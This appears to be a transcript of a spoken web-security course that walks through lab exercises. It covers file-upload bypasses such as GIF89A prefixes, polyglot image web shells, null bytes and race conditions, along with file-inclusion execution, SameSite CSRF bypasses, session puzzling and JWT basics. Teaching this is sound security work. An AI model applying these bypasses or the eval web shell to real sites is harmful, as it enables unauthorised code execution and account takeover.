Yeah. So let's do the abc.php or anything. Okay, let's capture this request proxy intercept is on browser submit size capture. Now right click send this to repeater. The repeater. Now my goal is to upload PHP. So if I'll give the abc.php, it won't upload. There is error. Yes, Okay, where this error. Oops, see, it's abc dot coming. Yes, they filtered the PHP word. Okay, and obviously you cannot execute abc dot. Now, what if I'll give PHP over there? So it will be spelled as a PHP after filtering the PHP word. Yeah. So now it's uploaded. Yeah. Now I'm putting 10, so I'll give 10 now. 10 dot this one. So 10 now. 10.php. So this is a way to do this. Yeah. So let's, if you'll upload and then I'll give 10.php, it's also replaced. Okay. See, it's worked. So this is a way to bypass this. Hello friends. Now I'm going to talk about picture prefix bypass. Okay. So basically, some application determines whether the first 2 bytes of the file contain our picture prefix or not. So like this, lesson 14. We'll see lesson 14 now. Okay. Lesson 14. Okay. If you'll translate this to English, okay, it's in Chinese. So okay. Upload to the server. Note: make sure that the uploaded pictures horse still contains the complete web cell code, not an issue. So what is picture horse? We'll see later. But using file containing vulnerabilities can run malicious code in picture horse. Okay, that we'll see. Okay. Source code. If you'll determine the source code, let's check the source code. This is the function get real file type. Okay, and that file type will first determine the whether it's a the file is a JPG, a real image or not. Okay, picture prefix or not. So the first way to do this is called add a picture prefix such as GIF. Okay, GIF prefix. The GIF prefix may be this one, GIF 89A. Okay, you can use this one. Okay. Now, so how to do this? Let me show you. 14. Let's try to upload. I want to upload, let's say, abc.php or whatever. Yes, I want to upload this one. Okay. Let's right click, intercept this request. Oops. Okay. Submit. So I just capture the request. Not good. I'll right click, send this to repeater for backup purpose. Now, if you click on the go, there is one error. The error, obviously, it's not a picture, and you have to upload a picture. Okay. Like this. If you upload this, what error you will get? Let me show you. If you upload this, you'll get an error in this one. Okay, and let me translate. This file is unknown and the upload failed. Okay, that's the error. Okay, now my goal is to upload this one, but now I'm going to talk about it's called picture prefix. So for that, in the code, add a picture prefix that is, let's say, this one, GIF 89A. Let's try this now. You can see it's uploaded as a GIF. Okay, so successfully uploaded file. We bypassed the file uploading restrictions. Yes, so we uploaded the file successfully. But now, how you gonna get access of this cell? It's very easy. You have to use include directory now. Okay, include file. Okay, so you need a you need a local file inclusion over there to get access. Okay, so include.php file equal to and the local file. This way you will get a code executions. Okay, this is the first thing. Second thing is called a second way to do this. It's a it's in simple language. You can say it's called picture horse. Okay, make a picture horse. Nothing but picture Trojan horse. Okay, picture Trojan horse. Okay, so how to make picture Trojan horse? It's very easy. And then you can directly upload. Okay, because the application is determining the first 2 bytes of the file. Okay, first 2 bytes. So you can use a Windows command called copy. Then you can use one dot any PNG file, normal JPG, anything. Okay, let's say JPEG. Now after that, give anything. Let's say /b. Now then you give +1 and then your code. Okay, into this image file you want to give one. Let's say you want to upload a cell.php, so cell.php. Okay, and then /a space or the output of image. Let's say output dot png or JPEG. Okay, JPEG. So this will generate a picture horse Trojan. Okay. So basically, if you will open this PHP, you can see contents of one.php. Okay. So if you'll open, let's say I made a file. Okay, I made already a my file. It's a 3.png. Now I want to open this file with a Sublime. Okay, so let's say file, and I want to open this file. So file open, and there's a document 3.png. I want to open this png file. Okay, the problem is I am not able to see the content. Okay, let me do this in the. So if you do in the notepad, okay, the notepad or notepad plus plus, you have to do this. Okay, so when you will do this, open with a notepad. Okay, you will find a code over there, and the code is nothing but uh, the PHP code. Okay, whatever code you want to write, that code will be there. Okay, for example, let me make a code. Okay, so right now I have a Windows, but cp command won't work. Okay, so if you try cp command, it won't work. Okay, yeah, cp command if it's in Windows, copy command is very easy to make a Trojan, make picture Trojan. Okay, so let me do this in the Windows. Okay, and so I have a code one.php also, php info. Okay, perfect. And then I have a one.png. Okay, perfect. And then I'll make this code. Okay, so let me do this. Okay, it's now if I'll make this, so let's say choose another app. Okay, let me do this notepad. Where is notepad? Okay, perfect. Now there is I made a file. It's the output. Okay, and let me try this output. Copy this output to my pen drive. The syntax is same. Okay, so I'm just giving you the syntax. Wait. Okay, output copied. So I have a file, the name output. Okay, syntax is same. Okay, you have to use the same syntax, this syntax. So I just use this one. I made a file one.jpg png. Okay, any png, I had png file, and then I had a cl.php, and I just used output.png. Okay, so I have a file now. It's in, okay, it's output.png. Now when you upload this file directly, let me select this file. Okay, so I'll browse the same thing, then I'll use okay, it's not okay. Let me copy this output.png to the desktop. Okay, let me now use this desktop file, so output.png, and I'll capture this request. Okay, so when I capture the request, oops, what happened? Okay, it's taking time. No worry. So when I capture the request, you got this. See this now. So you so output.png, and this is the image, and image is nothing but a Trojan horse. If you check the code also may contain my PHP info somewhere, yes. Or if it's not containing, that means there is some issue. See this? It's containing PHP info, yeah. Let's click on the forward and intercept off now. Do this. So you can see it's uploaded. Now it's uploaded where? It's uploaded copy image location. If you do this copy image, it's uploaded there. Yes. Now, what I want to do, I want to include. I'll use include directory, same. Okay. So use include.php file equal to this one. Okay, and then you may get a PHP info output. Okay. So okay, okay, it's loading. Let me close this one and then retry. Okay, so when I capture this request, this is not the request I'm looking for. This is the request. I'll right click, send this to repeater, and let's go to the repeater. Let's click on the go. So when you click on the go, it's response and it's waiting for the PHP info. Okay, and then you will get a PHP info output to the response. Okay, yeah, you got this. The output is this one, and if you look closely for PHP info, this is an image. This information may have your PHP info executable. Okay, that's it. Okay, the very easy is to you just use that one. Okay, see it's HTML supported, blah blah, date time zone, the class, open SSL. Yeah, see we are getting, yeah, SSL, yeah, and TLM. Yes, yes, yes. So we got, see this URL information, module URL, CTS type, yeah, XML RPC is there or not. Okay, so that means we got output of PHP info. After the image we got PHP info output. Yeah, okay. Hello friends, now I'm going to talk about get image size functionality bypass, and it's lesson 15. Okay, if you hosted on the Linux platform. Okay, if in Windows it will be 14. Okay, one back. Okay, get image size functionality bypass. Now if you look for the code, you can see that they're using get image size to get the file type, or you can use the image host to bypass it. Okay, so here they used get to check the get the file type. Okay, now I want to bypass it, so I'll use the same thing, the first method. Okay, let me do this. So let's capture the request, and I'll use abc.php. Okay, so I just capture the request, right click, send this to repeater for backup purpose. And the repeater, this abc.php, yeah, perfect, not an issue. I'll just add GIF89A. Let's try to upload this one. Yeah, see, we uploaded successfully. Then I'll use include function. Okay, so you can use include function, include, and then I'll use this get GIF. Okay, file. Yeah, see, we got the PHP info file. Yeah, now second way is through, second way to upload directly picture horse, and the picture horse we have already done output.png. Let's capture this request. So I just capture the request. It will take time because it's an image. Now at the end of this PNG, you'll see there's our code, and our code is this one, PHP info. Yeah, and I want to check the response, so I'll send this to repeater, and let's go to the repeater. Let's click on the go, and the response, just wait for the response. Okay, we got the response, and if you check the response, you can see, okay, the PNG file uploaded successfully. Yeah, it's uploaded PNG file there. Yes, perfect. Now obviously you need an include directory, so you can give the file uploaded successfully. Now you can go include.php file equal to this one, and then let's capture this request proxy, send this to John. Let's enter. So I just capture the request, I right click, send this to repeater. The repeater, because this is a picture Trojan horse. Okay, so it may take time to load. Okay, because first they will load the image. This is the image. Okay, the image. Now after the image, if you scroll down, you may get output of configurations, Apache 2 handler. See this version, PHP info. Yes, yeah, we got that. So this is a way to bypass this. Hello friends, now I'm going to talk about PHP underscore exif. Okay, PHP exif module bypass. So the PHP exif module used to determine the file type. Okay, again same thing, you can use picture horse. So let me show you. You have two ways. First, through GIF. Okay, by using picture horse prefix. Okay, picture prefix. So you can use abc.php. Let's capture the request, and then you can use let's say any day. Okay, it's a lesson 16. Okay, Remember, it's lesson 16. Okay, now you GIF 89A. Okay, let's right click in this to repeater for backup purpose. Let's click on the go. Okay, it's uploaded or not. So it's uploaded successfully. Now, if you want to access this one, you have to use include. Okay, so let me use include file equal to this one. So there should be a file inclusion in a real website to exploit this one. Okay, let me capture this one. So right click, send this to repeater for backup purpose. Let's click on the go. Let's go, and then you'll get the output of after the image. You may get a PHP info executions. Yes, see. If you render, you can also render this one, and render will give you the browser view, but it's not coming back. Okay, no worry. Okay, but we got see this output. Yeah, that's it. That's enough. Now, another way is to through picture horse directly uploading. Okay, so intercept is on. You already have this one 16, and then you can use output that I made output.png. Okay, let's upload. Oops. Okay, cool. Now you already know this. You can send this to repeater. Why repeater? To get a path. Okay, then if you click on the repeater, let's click on the go, and it will be uploaded successfully. It's 2.5 MB, so you have to wait. Okay, cool. And I got a PNG file. It's uploaded, yes, and the directory. So now I'll use include. So include, I have already this one. Let me replace this one with PNG, and let's click on the go. Now raw. Okay, raw. So when you use raw, and there you will find. Okay, see, it's the output. Okay, output of the PHP info. Yeah, output handler, output buffering, memory class, blah blah blah. Yeah, okay. So this is a way to bypass PHP exif module also through picture horse. Okay, now you understood why it's important. Yeah. Okay. So hello friends, welcome back. So now again I'm going to talk about comprehensive picture horse example. Yeah. So this lab, let's talk about this lab now. It's a lesson 17, and the lab have many functionalities. Okay. The first, the application will judge on the basis of suffix. Okay. If the suffix is PNG, the file type should be image/PNG. The suffix is GIF, file type must be image/GIF. Okay. So you can directly use a picture horse. Okay. Why picture horse directly? Let me show you. So intercept is on now. Okay, and I'm going to upload. Let's say uh, we have already generated a picture horse. So I'll use desktop. It's a output.png. Okay. Let's capture this request. Why I'm telling you to directly use, because you can check the first, its extension output.png, it's correct, and the content type is also image/png, and it's a PNG. Even the image created from GIF to determine whether it's a GIF image or not. Okay, so it's a PNG image, so not an issue. Now at the end of this, you already know may contain a PHP code. Let's click on the go. And then you will get it's uploaded successfully. Yes. Now after uploading, you have to use include methods to execute this one. So you know how to execute. Yes. That's it. Thank you. Thank you so much. Hello friends. Now I'm going to talk about very unusual situations. Okay. I hope it's recording. Yeah. Perfect. Now, so this is called conditional race to delete file time difference bypass. Yeah. So basically, when you upload something, okay, the situation is like this one. Okay. So it's called when you upload something. So first it's move, then detect, if not match, then delete, and change the name if it's match. That's the situation. Okay. So let's talk about the source code now. The situation is this now. First, move. First, it will move your file. Okay. From uploaded file to the temporary file. Now, it will detect Now it's detecting whether it's a image or not. Okay. Third, if it's image, it's if it's not matched, then simply delete it. Okay. And if it's matching, then what? Then rename. Okay. Change the name. Okay. That's the functionality. Now, so there is a time difference between deletion. Okay. If not matched, then simply it will delete. Okay. Now, so there is a time difference. Okay, between delete. Okay, so we can use, it's called conditional race. There is a race condition, so we can use a burp suit also. Okay, so what we have to do, in if you will use burp suit, we have to upload simultaneously, or we have to simultaneously check to the whether it moves to the PHP file to upload directly or not. Okay, so you can use, let's say this one. Okay, you can use this one. Let's capture the request. Okay, so I'll use, let's say, abc.php for example, and let's capture the request, upload, and right click, send this to intruder, because we have to upload this. Okay, positions, then I'll first clear payloads, simple list to null payloads you can use. Okay, and then how many times? Let's say 5,000 or 50,000 times. And simultaneously you have to check there. Okay, what you have to check 192.130 slash upload slash abc.php simultaneously. Maybe due to the time difference, you may get abc.php sometimes, okay, or maybe not. Okay, it's not possible manually to, okay, to reload abc.php. So what I will do, will generate a Python code. We'll write a Python code. So I wrote a two Python code. Okay, this time code py.py. This code will use, for that you have to install a hack http request. Okay, so you can use pip space install space hack http. Okay, listen carefully. Pip space install space hack http. That you have to do this. Now, by using this modules, you can send a request. Okay, so I'm sending a request. It's in blah blah. Okay, so complete request body. I just copied this burp suit, copy, and then complete request body you have to give there. Okay, in this scenario. Now, so the after the request body, you want to check code, head, HTML, redirect, log, what happened. Okay, and then code, filter with R, and then, so basically you're giving threads. Okay, 10,000 threads or 50,000 threads. Okay, now, so let's give 50,000, because we don't know when it will occur, there will be a race condition. Okay, now why I gave this code, the PHP code, instead of PHP info, give this one, PHP echo md51, and that you should write into the cell.php. Okay, where cell.php. So there will be a file open, and that will execute cell.php. Okay, for example, like this one, let me show you. This is the Docker. I have ls. If I'm doing ls, there's nothing. Okay, so I'm trying to write a md51 into cell.php, then executing php eval function post cmd command. Okay, that I'm doing now. Now I'm going to write a Python script to access the uploaded file. Okay, all the time, to generate a new cell. Okay, whenever it will generate a new cell, I want to access. Okay, so for that you can use a code 2. Okay, code 2 only have the import request module, and I'm trying to fetch abc.php that I uploaded over there. Okay, abc.php. Okay, and if anytime if I'll get abc.php, obviously there will be a md5. Okay, in a text. So md5 c4 cac, this it's nothing but md5 of 1. Okay, that, and that will get. Okay, so you can run in first command this one, python space code.py. Okay, and in second you can write python space code 2.py, okay? And this way, if any occurrence will happen, you will get an output yeah. So the output will be yeah, yes, we got cell, something like this will be printed on the screen, okay? So this is a way to do this, okay? It's very complicated, yes. So you can do this later, okay? I'll share you this code with you. Hello friends. So again, I'm going to talk about conditional race bypass, okay? File uploading, okay? So why I'm going to tell you, see this. See, let's talk about the first situation, source code. Okay. If you observe the source code correctly, what was the first? The first scenario is case one. Okay. Let me read this, okay? One more time. Okay. The first is what? Check function upload directory. Perfect. Result upload. Check extensions. So this sections makes a whitelist judgment on the file suffix name, okay? File suffix name, and then check the file size, okay? Then check the file size, and then existence of file size, okay? Existence of the files, etc. Step by step, after uploading the file is renamed, okay? The file is renamed. So there is also a loophole for conditional composition that you already know what you have to do. You can continue to use burp to send data packets to upload pictures of horses, okay? This will be one case. Second case, you can also use file horse, okay? The image horse, okay? Let me show you. Okay, I'll capture request, let's say abc.php. Perfect, intercept is on now. Done. And then right click, send this to repeater. And instead of this abc.php, I'll use, let's say, what? I'll use, let's say, it's lesson number 19, so I'll use 19.gif, okay? And content type will be image/gif. Perfect. And then code, let it this code, okay, PHP code with GIF. So I'll use GIF 89A. Perfect. Let's click on the go, and it's uploaded successfully. Now after uploaded, I can use include directory, okay? So /include.php file equal to this one, and let's enter. See, it's executed successfully. So this is also a way. Hello friends, welcome back. So now I'm going to talk about null byte in file uploading, okay? Okay, so now it's a lesson 20, okay? Now I'm going to upload a file. Let's say upload a file, abc.php. My goal is to upload a PHP file over there, and intercept is on now. Let's browse and upload. Right click, send this to repeater. Let's click on the go first. Let's check it's uploading or not, okay? It's uploading, yeah? The file uploaded 19.jpg, and you can access it directly also, okay? So, but it's okay, it's like an image, okay? You can try to, let's say, include PHP and the file equal to that image file, okay? You may get, yeah, see, this is one way. Second way will be through, see, if this is, you want to try to PHP upload, you can upload as 19. You can use %00.php dot jpeg, sorry, dot php %00.jpg. So this way you can also try, but when I'm tried this, you can see %00 is directly coming as a string, not a. So you can do, instead of %00, you can give the decryption of %00 to get decoded, okay? Maybe it will work, okay? So when I gave this, and I can see it's uploaded as a PHP, yeah? Then you know how to execute this. Thank you so much. Hello friends, welcome back. So now I'm going to talk about CSRF same site bypass. And I'm going to show you this in lab first of all, okay? So you know CSRF is an attack that tricks the victim into submitting a malicious request that you know, okay? Now, My goal is to focus on same site bypass, but before that, I'll be showing you the normal CSRF behavior. So this one is a lab OWASP SKF lab, okay? And I set up this lab. Now, CSRF login insecure first of all. So you have to log in this, and when we'll be logged in to the application, we can see that we can set our favorite color, okay? And this will be stored in the session of the user. For example, I want to set hack, submit. If you refresh this page, you can see its hack is set for stored, okay, in the session of the user. Okay, now let's intercept this request. So I'm going to capture this request first of all. Intercept is on. Let's XYZ submit request. So I just capture this request. Now I'll right click, engagement tools, generate CSRF POC. Now you can test in browser, copy. Let's forward, okay. So you can refresh, it's XYZ now. Test in browser, it's XYZ, okay, no worry. Now let's change something into this, okay. So I'm going to change XYZ to XYZ01, regenerate, test in browser, copy. Okay, let's test this. Submit request, refresh, it's XYZ01, okay. If you refresh previous tab also, it will be XYZ01, yes. So the CSRF is possible over there, yes. Now, let's capture this request, okay. Now we'll talk about the before jumping to the demonstration. Okay, let's jump to the demonstration first of all. Okay, so right now I'm going to say CSRF login secure. Okay. Okay. So I'll be talking about the CSRF login secure first. One second, my live stop. So okay. So we'll be talking about CSRF login secure now. Submit request. Let me do this. Okay. Intercept is off. Okay, it's waiting. Just wait for a few seconds. Okay. So now this is a login strict. No worry. Okay, let's capture. Okay, let's go back. Okay, first of all, I want to capture this login sequence. Okay, into repeater. So intercept is on now. Login secure. If you check the login secure, login strict. Okay, this is a post login strict. Username is admin password. This is a session. Okay, not an issue. I want to see the response of this one. So right click, do intercept, response to this request. Let's forward. If you see the response, there's a set cookie sessions, and the set cookie have HTTP only, as well as same site equal to strict. Now, why people use same site? First of all, let's talk about that one. Okay. So now I'm explaining you same site. Same site attribute. It's an attribute. The modern browser have introduced a defense in depth mechanism against CSRF type of attack. So it's a defense in depth mechanism against CSRF type of attack. Okay. Now let's talk about this. So we got to know they are using this one, set cookie, HTTP only, path, and same site equal to strict. Okay, perfect, not an issue. Now these attributes allow the user agents to identify whether a cookie should be sent along with CSRF or not. Okay. So this attribute, the same site equal to strict, it allows the user agent, the browser information to identify whether a cookie should be sent along with the request or not. Okay. So again, same site have many values, not only strict. Okay, same site have few values. We'll talk about the one. First is a strict value. Okay, strict. Now let's talk about the strict. What is strict? Cookie will be only sent with same site request. Okay, cookie will be only sent with the same site request. Now there is another lax. So let's talk about the lax. Cookie will be sent with same site requests and also with CSRF generated generated after top level navigations. Okay, top level navigation that are not prone to CSRF. Okay, so we'll explain you one by one. Okay, now there is none. There is same set equal to none. If none is there, it's a one level. Okay, none. Cookie will be always sent with C cross site request. Okay, cookie will always sent with cross site request. So whenever you will made with other request to CSRF, other with file. Okay, let's talk about the second now. So we got to know they are using same set equal to strict. Now let's try to set the preferred color. So I'm using hack for example. Let's capture this request. Intercept is on. So I just capture this hack request, and you can see cookie have sessions. Okay, perfectly. I will right click engagement tools, generate CSRF POC. Now this one, yes. Now let's do one thing. Let's set this. Let's forward this one. Okay, so that you can see the hack is set. If you refresh this, hack is perfectly alright. Now I'll do one thing. This one is okay. Now let's do this. Same site secure. Okay, same site secure. I'm using color. Okay, this time. Okay, let's regenerate this and test in browser. So if you test in the browser, I want to check in the response. Okay, how the request submit request. So if you submit the request, in the submit request there is no cookie. If there will be no cookie, it won't set. Yeah, so let's forward this. If you forward this now, you can see it's redirected to the login page because there is no cookie in the request. Okay. As the cookie was set in a strict mode, the browser was instructed to not send it with any cross-site request. Thus, as color change required as authenticated sessions, this request is treated as an anonymous one and therefore rejected by the application. This one is the scenario. This is secure one. You can say it's a secure. Yeah, perfect. Not an issue. It's secure one. Okay. Now let's go back. So this CSRF login secure, perfectly alright. Now there is a CSRF login still insecure. Why it's still insecure? Let me show you. Let's capture this request. Submit button. Now I don't know how they are setting the cookie. Okay. So I'll do one thing. I'll do intercept response to this request. Let's forward. Now you can see they're using same site equal to lax. Now lax mode works by using the login still in secure authentication form. Okay. Let's do one thing. Let's go to this color set. If you do XYZ, submit button. Okay, perfectly. Okay. Now I'll intercept this request. Let's do one thing. XYZ. Okay. So XYZ, right click engagement tool, generate CSRF POC. Okay. Now let's forward this. If you forward this one, okay, the XYZ is there perfectly. Now I'll do one thing. I'll change this color to same site lax this time. Regenerate. Test in browser. So to test in browser, copy this now. I want to capture this request. Intercept is on now. Let's capture this request. Okay. Submit request. So when I submit the request, you can see there is no cookie. Basically, lax mode also block the cookie to be sent over post. Okay. Lax mode also block. Okay. Lax mode also block cross-site post request. Okay. Now if they block cross-site post request, what about the get request? So they block this request. Okay. Perfectly, not an issue. And you can see it's not set. Refresh the page, it's not there. Yes. Now I'll do one thing. I have the request. Yes. CSRF POC. You can see this is the lax one. Okay. I'll right click engagement tools, and there's a change request method. Now right click copy URL. Perfectly alright. Now I have a get request. Now let me do this from there. So I just capture this request. When I capture the get request, you can see cookie is set in the gateway. Let's forward it. Just off. You can see. Refresh the previous page. Same set like so. Basically, so if the cookie same site will be set as a lax, get query string parameters you can use. Okay. So this is a way to do this, okay? Lax mode allowed the browser to send the cookie through the CSRF cross-site request after top-level navigation using a non-CSRF method. In other words, if the application accepts get query string parameters to change data in persistence or allow post request being converted into get, CSRF attack will also succeed. Okay. So the lesson was this one. Okay, you should have tried something like this one in real website. Hello friends, welcome back. So now I'm going to talk about CSRF same site bypass. So this is the lab link. Okay, you can try this lab link. It's a very good one. Okay, so I'm just showing you. Let me, the recording is going on. Yes, it's going on now. It will only work in the Chrome, so that's why. Okay. So let's say home. Right now I'm not logged in. Okay. If you're not logged in, these have three main features. Okay. So you can click on the right click inspect element. Sorry, not the view page source. Right click inspect element, and then you can go to applications. Okay, and the applications maybe have a storage. Okay, a storage cookie, and you can see, you'll get to know there is a cookie or not. Okay, so right now there is no cookie. Okay, now let's click on the login. You can see there says there is no cookie right now. If I'm giving the username, let's say Vikas, for example, let's log in. Okay, I don't know the session generated or not. Let me do one thing. Right, let's click on the home again. So I'm logged in, and you can see one session generated. The value the value is Vikas, and they're using HTTP only and same site. Okay, now, and the settings may have CSRF, but it's a post-based. So post-based CSRF won't work over. Okay, it won't work. So settings sends a post request to settings.php to change the username. For example, if I'm doing, let's say, hacker, so it's sending the post request and username changed. Okay, now obviously that request requires a sessions. Okay, if session cookie will be not present, then post request files a throw a CSRF error. This is based on the challenge 3 what I shown you previously. Okay, but if I look closely to this application, there is one logout functionality. Okay, logout functionality. What we need to do is sending a request to logout.html. Okay, which changes the cookie to null. Okay, so if I click on the logout, you can see there is no session. It's null right now. Session equal to null. The browser will know the cookie is changed, and the 2-minute feature will work. So when you click on the home again, you log in. Let's XYZ login home. Okay, it's login. So now, so when you click on the logout, the browser will wait for some time. Okay, and the session cookie will be sent along. Okay, so what if I'll click on the logout button, and within few minute request, I'll send the settings.php request. Okay, now for that we'll make one HTML file. Okay, let's say the HTML request will be this one. Okay, this is normal script one. Okay, let me explain you this one. The first part of a script is sending one request to the logout.html, and there you are setting timeout. Okay, for 1000 milliseconds. Okay, whatever. Okay, now second request I'm sending click me, and that request I'm sending settings.php. Okay, it's a post request from method post action settings.php name new value pwned. Okay, that's a new value. Okay, you can check this closely. So if you look for this inspect elements, you'll get to know the post body. Okay, let's right click inspect element, and oops, okay, so then you'll get to know the post request. Okay, how post request formation is going on. Okay, change your username method post, and this is the form new name. You can set the new name, and it will submit a request to settings.php. That's what I've done there. Okay, now let me save this request as a CSRF same bypass.html. Okay, cool. I have this request now. Right now my username is XYZ. Let me open this file. Okay, so I have this file CSRF same site bypass, open with Chrome browser, and I click on the click me. When I click on the click me, the username is changed. Okay, Now the new username is, if you look for the home, pond. Yes, because of the file content, this username. Yes. So this is a way. This is a way to bypass. Okay. The conclusion is same site is a great browser feature that can prevent a wide range of client-side attack, but it's not a bulletproof technique. Okay. So basically, if you are using a lax, okay, same site equal to lax plus post will be a new way to bypass this cookie. Okay. So make sure the same site you use a strict one. Okay, then it will be secure. Okay. Thank you so much. Or maybe not, because when you use a logout functionality, it will be used obviously a lax, okay, or it will gate will be allowed over there. So this is a way to bypass. Hello friends, so I'm going to talk about session puzzling now. Session puzzling is an application level vulnerability. Okay, vulnerability that occurs when the application session variable is using more than one purpose. Okay, more than one purpose. The other name of session puzzling is session variable overloading. Okay, you can also say session variable overloading. Okay, overloading. Now, the attacker try to access application entry point. Just assume how the attack works. Okay, attacker trying to access application entry point. Okay, applications entry points. And the session object creation can be indirectly initiated. The session objects creations assigned, okay, indirectly assigned, okay, basically, or initiated while exploiting session puzzles and later exploited by accessing any entry points such as web services, web pages, remote procedure call, etc. Okay, I'll explain you later on. First, let's talk about the impact of this vulnerability. Session puzzle enables the attacker to bypass authentications, impersonate legitimate users, elevate privilege, bypass flow restrictions, okay, and execute additional attacks. Now let me explain you how to find this, okay, how to hunt. Okay, it's very easy. How you gonna hunt this vulnerability? Do one thing. First, see, now attacker tries to access application entry points, so you have to try the few application entry points. I am assuming there is a forgot password page. Okay, forgot password page. And when you try to reset your password, the applications session objects initiate session, generate session. Okay, let's talk about generates. Okay, generates session key. Okay, now third, it's application behavior. You just gave your email ID and the application generates one cookie for you. Okay, now you reset your password, and you are logged in, or whatever. Let's say the same session, you reset your password, or same session continued, and you are logged in. Okay, you are logged in. This is the situation. Okay, now in this case, what will I do? I will not reset my password. I will just, I'll just give the so this is the scenario now. You reset your passwords, or you feed your correct details and session generates. Okay, now a user, just assume a user logged in. Same session continued. What if I'll use the sessions to access some sensitive information like dashboard, something? Then there's a session puzzling. Okay. Now, how to detect exploitation or detect? Session puzzles can be detected and exploited by enumerating all the session variables used by the applications and in which context they are valid. Okay, this is important. Session puzzles can be detected and exploited by enumerating all the sessions variables by the applications variables used by the applications and in which context they are valid. Okay, they are valid. Okay, so in the next video we'll see the demonstration of this one. Okay, thank you so much. Hello friends, so we have session puzzling lab situations right now. Okay, how to set up this lab? It's very easy. Let me connect to my lab 1 2 3 4 5 6. Okay, and okay, cool. So cool, clear. I'll make sudo space -s, make myself root first of all. Okay, so I'm the root. Into now you need to download one SKF lab. Okay, SKF labs from GitHub. Then you go to the CD session puzzle ls. There is one requirements.txt file. Okay, so you have to do this pip3 space python3 required. Okay, so pip3 space install space -r requirement.txt. It's satisfied. Now you change one thing into the session puzzle file. Okay, so I'm going to change one thing. Go to last line, and there will be a 0.0.0.host. Okay, this you write your own IP address. Okay, the Linux or Ubuntu or Kali Linux IP address. Okay, now after that run this with python 3 session puzzle.py. That's it. Okay, it's started now. Okay, so the lab is started now. Okay, let's settings. I want to check whether it's generating one cookie or not. Okay, so let me do this. Inspect element. I'll go to the memory or applications, and then applications you will find the cookies section. Okay, now right now you can see there is no cookie. Yeah, cool. Let me submit with the admin. Okay, so I'm admin, and the admin, let's submit this request. When I submit the request, save. I don't know whether it's generated cookie. Yeah, it's generated one cookie. Okay, sessions, and it's generated one cookie session. Okay, and the confidential label C. So when you authenticate yourself, you'll be going to the confidential level C information. So all good. Okay, now let's log out. So when you log out, session plus. Now let's go to the forgot password. When I click on the forgot, there is no sessions. Now if I'm giving a wrong username, let's say Vikas, submit, there is no session. Now if I'm giving a true username, let's say admin, session should not generate right now. Yes, but session is generated. Yeah, you can see the session is generated. Now basically user logouts and forgets his passwords and attempts to recover his password by providing the username admin. If the username is valid, the app say receive his new password through an email. Yeah, that's a normal condition. Yes, but what we observed, the application sets a new session cookie, and once the password and once the provider username request by the application. Okay, now session puzzling attack is possible since the app uses a session variable for more than one purpose. What if it's in scenario we try to access a dashboard page? Now, what if I'll access instead of forgot page? What if I'll access dashboard page directly? See, the C session is same session, yes, and the same session I got access to the confidential level C. I'm logged in. So this is called a session. Okay, so we can actually access authenticated pages without logging into the applications. This proving that we are able to successfully bypass authentication mechanism. So this is a way to session puzzling. Okay, thank you so much. Hello friends, so now I'm going to talk about live session puzzling test cases. Yes, now assume there is a scenario, okay, for two-factor authentications. The current, I'm listing the steps now. Okay, so what is session puzzling? You know, if session objects, if session uses, yeah, if session uses more than one purpose, okay, then application session value is using more than one purpose, then there will be a vulnerability, okay. So my goal is to identify whether the application session serving more than one purpose or not, okay. So let's assume there is a user, the normal login procedure. User provides email and the passwords to log in. Yes, user provides email and passwords to log in. Okay, that's normal sequence. Yes, passwords to log in. Okay, second steps. After that, a valid 2FA code is sent to the user registered telephone number. 2FA. 2FA is there. Okay, two-factor authentication sent to phone number. Okay, that's a normal sequence. Yeah. Okay, cool. Third, the website asks for the 2FA code. The users type in the 2FA code. 2FA code. Yes. 2FA code supplied. Okay. Now there may be situations that maybe session generates there. Yes. And the users type, and the users logged in. Okay, that's normal situations. Now, what if, let's say this one is one purpose, and let's session basically has two states. Let's say if session has two states. The first state, username and password have been supplied correctly, but the 2FA code has not yet been provided, but session still generates. Okay. This one case second, username, password, and the 2FA code have all been supplied correctly. That's two states. Yes, but session generates. Then there will be a vulnerability. Yes. Now, I don't have any real scenario right now. Let's go to the Facebook. Okay, maybe Facebook. I have two-factor authentications. No, I don't have two-factor authentication in the Facebook. I have two-factor authentications in the Gmail. Okay, let me forward. Let me log out. Sign up from all my account. Cool. Continue. Okay. Now I have one account. It's Vikas Chaudhary. Okay. Now I'm giving the passwords. Okay. So when I'm giving the passwords, it's logged in. Okay. Okay. What to do now? Let's say any other applications. Let's say Flipkart. I don't have any application to authentication. Okay. Let me check. Let me check on Facebook. Okay, facebook.com. If we log out. Okay. I will not log out. I'll open the incognito mode there. Okay. You can go to the facebook.com. Okay. Okay. Email address. Cool. Now, okay. I logged in, man. There is no, let me enable two-factor. Okay. The problem is right now I don't have this one. So what I'll do now, let me check. Okay. PayPal, I don't have two-factor authentications. Where I have two-factor authentication? Gmail, I have two-factor authentications. Okay. Let me log out the Gmail. Okay. Continue. Now this is my account. Let me do this. So when I signed in, it sent me, no, it's logged in. Okay. So where I have two-factor authentications? You just understood you how to test this. Very easy. Scenario is this one. Okay. Do one thing. Go to the login page. Supply. Okay. Let's say login page is app.com/login. Okay. Go there. Okay. Now after that, obviously two-factor authentication will be sent. I'm just taking the situation of two-factor authentication. Okay. Sent to the phone number or email ID. Okay. Then in that case, do one thing. App.com and try to fetch some sensitive page, that the authenticated page data. Let's say authenticated page. Okay. Page. And if you'll get in the second step, because the two steps, if the cookie is set over there, try to fetch two-factor authentication page. Okay. And if you get data up, then there is a vulnerability. Okay. Authenticated page. That's it. You can try this. Okay. There will be two situations, two states. Then there will be vulnerability. Okay. Hello friends. So now I'm going to talk about JWT. So many applications use JWT to allow the client. Okay. To allow the client to indicate its identity for further exchange after authentication. Okay. So in simple language, you can say JWT used to carry information related to the identity and characteristics claims of a client. Okay. So JWT carry two things. One is information related to the identity and characteristic of a client. Okay. For client. So these two things they carry. The information is signed by the server in order for to detect whether it was tampered with after sending to the client. This will prevent an attacker from changing the identity or any characteristics. For example, changing the role from the simple user to admin. So so JWT basically detect signed from the server to detect whether it's tampered or not. Okay, that's the main thing. Now the token is created during authentication. Okay, is provided in case of successful authentication and is verified by the server before any processing it. Okay, let's talk about the token structure of JWT. Okay, so I'm just giving you one example of token structure. Token structure will be this one. The first, which will be base 64 header. Okay, the base, it will be base 64 header. This will be the header one. Okay, dot there will be base 64 payload. Okay, I'm just giving the base 64 example. Okay, payload. Okay, payload. Then there will be base 64 signature. Okay, so base 64 signature. This is the normal token structure of a you can say JWT. Okay, a sample. I'm just giving. Let me show you the example. Okay, JWT.io. Okay, so if you look for this one, you'll get to more information. Okay, so you can see the sample one. It's first one is a header information. Okay, then there is a payload, and after that there is a signature. Okay, now signature again have base 64 URL encode header, then payload, and then there will be a key, your key. 